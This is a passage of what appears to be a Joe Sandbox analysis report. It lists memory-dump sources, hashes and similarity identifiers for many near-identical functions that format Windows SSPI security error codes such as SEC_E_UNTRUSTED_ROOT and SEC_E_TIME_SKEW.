                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_INSTALL
                            • API String ID: 1435330505-2628789574
                            • Opcode ID: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
                            • Instruction ID: 0404fafb3374cc1c77b7fb03ae7ff77b3caf9967fed1c7d0e9e04cb7001e32bf
                            • Opcode Fuzzy Hash: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
                            • Instruction Fuzzy Hash: 12118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_ALGORITHM_MISMATCH
                            • API String ID: 1435330505-618797061
                            • Opcode ID: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
                            • Instruction ID: a72dd0424fe633ca7d12ec1fa8b38f21f50bf957a8b655b419db9fe6c64c4a1d
                            • Opcode Fuzzy Hash: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
                            • Instruction Fuzzy Hash: 04118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_PKGID
                            • API String ID: 1435330505-1052566392
                            • Opcode ID: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
                            • Instruction ID: 38c57b60170359261f68ab0a9c6f7822fb927ce621b8cedd7e280c3cdf4581f9
                            • Opcode Fuzzy Hash: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
                            • Instruction Fuzzy Hash: 2B118F22618A4285E7A9FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_BINDINGS
                            • API String ID: 1435330505-2710416593
                            • Opcode ID: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
                            • Instruction ID: 39472aebd04833f89d2410b6b9fe8fb97459cdc1593d209a89a2df26a5aed6ff
                            • Opcode Fuzzy Hash: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
                            • Instruction Fuzzy Hash: 7C118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_FUNCTION
                            • API String ID: 1435330505-1880870521
                            • Opcode ID: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
                            • Instruction ID: ae6d93df7596765a9dcb5a3d2e9523e814603adda19b0d29bde2abb1ce771eca
                            • Opcode Fuzzy Hash: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
                            • Instruction Fuzzy Hash: 65118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_UNTRUSTED_ROOT
                            • API String ID: 1435330505-3666586070
                            • Opcode ID: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
                            • Instruction ID: 6ed71da8ee114d3f71d6ae5f89f46a818671ba8eb2c34249fe60b261f0d23ac1
                            • Opcode Fuzzy Hash: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
                            • Instruction Fuzzy Hash: 1B118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_PREAUTH
                            • API String ID: 1435330505-3662181683
                            • Opcode ID: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
                            • Instruction ID: 3d42f4d51149f8191d1a0346908df5b07d7edf4c5df458057906a730a696d169
                            • Opcode Fuzzy Hash: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
                            • Instruction Fuzzy Hash: 70118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_UNFINISHED_CONTEXT_DELETED
                            • API String ID: 1435330505-784520498
                            • Opcode ID: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
                            • Instruction ID: 2b32c13f5472ef11929691b6ae44585ce1b5f499f902e3dddd8dfa7c5993d311
                            • Opcode Fuzzy Hash: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
                            • Instruction Fuzzy Hash: 08116D22618A4285E7A8FF10A0402EDA375FF88781FC14036E9AE027D6DFFCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_TOO_MANY_PRINCIPALS
                            • API String ID: 1435330505-1024473768
                            • Opcode ID: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
                            • Instruction ID: 708259cfb3cb4e1f5f2becb6bdd1d6f86a3bf1a1e0f852d01240835f6dbb6747
                            • Opcode Fuzzy Hash: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
                            • Instruction Fuzzy Hash: 16116022618A4285E7A8FF10A0402EDA375FF88741FC14036D99E027D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_UNKNOWN_CREDENTIALS
                            • API String ID: 1435330505-526997280
                            • Opcode ID: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
                            • Instruction ID: 556cf35b223e81d5653f4104138211cb8c86ceab5a366015341fef5ccee29d64
                            • Opcode Fuzzy Hash: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
                            • Instruction Fuzzy Hash: D8118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_TARGET_UNKNOWN
                            • API String ID: 1435330505-2019469157
                            • Opcode ID: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
                            • Instruction ID: 48bf90b9367d958b861347f23fb206f4c49e4b1099c648d13f8b9f15abc30d10
                            • Opcode Fuzzy Hash: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
                            • Instruction Fuzzy Hash: 1E116D22618A4285E7A8FF10A0402EDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_TIME_SKEW
                            • API String ID: 1435330505-867874831
                            • Opcode ID: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
                            • Instruction ID: c39a2165a9bf9f1bfe04f4d0736f627954393dadb1727fad396cb65078deb4ae
                            • Opcode Fuzzy Hash: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
                            • Instruction Fuzzy Hash: F9116022618A4285E768FF10A0402EDA375FF88741FC14036D99E027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_REVOKED
                            • API String ID: 1435330505-2367886648
                            • Opcode ID: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
                            • Instruction ID: a75d731d8ca424add0b93c412c8cfdb48a3aaa27a214e7fae5a83e61ff322562
                            • Opcode Fuzzy Hash: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
                            • Instruction Fuzzy Hash: E2116D22618A4285E7A8FF10A0442EDA375FF88781FC14036E9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
                            • API String ID: 1435330505-2827815589
                            • Opcode ID: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
                            • Instruction ID: cffda26b10fffcb2c20696fd783d5698682311f600069d0f5302135ef472528f
                            • Opcode Fuzzy Hash: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
                            • Instruction Fuzzy Hash: 9A116D22618A4285E7A9FF10A0402FDA375FF88781FC14036E9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_LOGON_REQUIRED
                            • API String ID: 1435330505-530148132
                            • Opcode ID: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
                            • Instruction ID: f8acc8f4a383e8058d37a60d9b570a7b2bd9a6c1b5b5a05b81942ddd262de9f6
                            • Opcode Fuzzy Hash: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
                            • Instruction Fuzzy Hash: 69116D22618A4285E7A8FF10A0442EDA375FF88781FC14036E9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SHUTDOWN_IN_PROGRESS
                            • API String ID: 1435330505-1032945330
                            • Opcode ID: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
                            • Instruction ID: a7ea933de123ab74b09e0036c5ec94d55c070e7e39ab65dd9ce2608b0dc20af2
                            • Opcode Fuzzy Hash: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
                            • Instruction Fuzzy Hash: 0B118222618A4286E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SECURITY_QOS_FAILED
                            • API String ID: 1435330505-538001202
                            • Opcode ID: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
                            • Instruction ID: 47247ea32930ed2a52762b410fab2ac604ac39280a9640b99bca487fcb9b0886
                            • Opcode Fuzzy Hash: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
                            • Instruction Fuzzy Hash: 42118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_EXPIRED
                            • API String ID: 1435330505-701404350
                            • Opcode ID: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
                            • Instruction ID: 01cd610f9fdfc9cd91b6d8573efac072b9de13d6e2efba7c6e86347680a7d6cb
                            • Opcode Fuzzy Hash: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
                            • Instruction Fuzzy Hash: FD116D22618A4285E7A8FF10A0402EDA375FF88781FC14036E9AE027D6DFFCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_KDC
                            • API String ID: 1435330505-3944752561
                            • Opcode ID: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
                            • Instruction ID: 0ecb20e2b55bd0958e9165852b35994dec7f47530f4d0bc5d65d48a76555c13f
                            • Opcode Fuzzy Hash: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
                            • Instruction Fuzzy Hash: 55118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_SECPKG_NOT_FOUND
                            • API String ID: 1435330505-2788034027
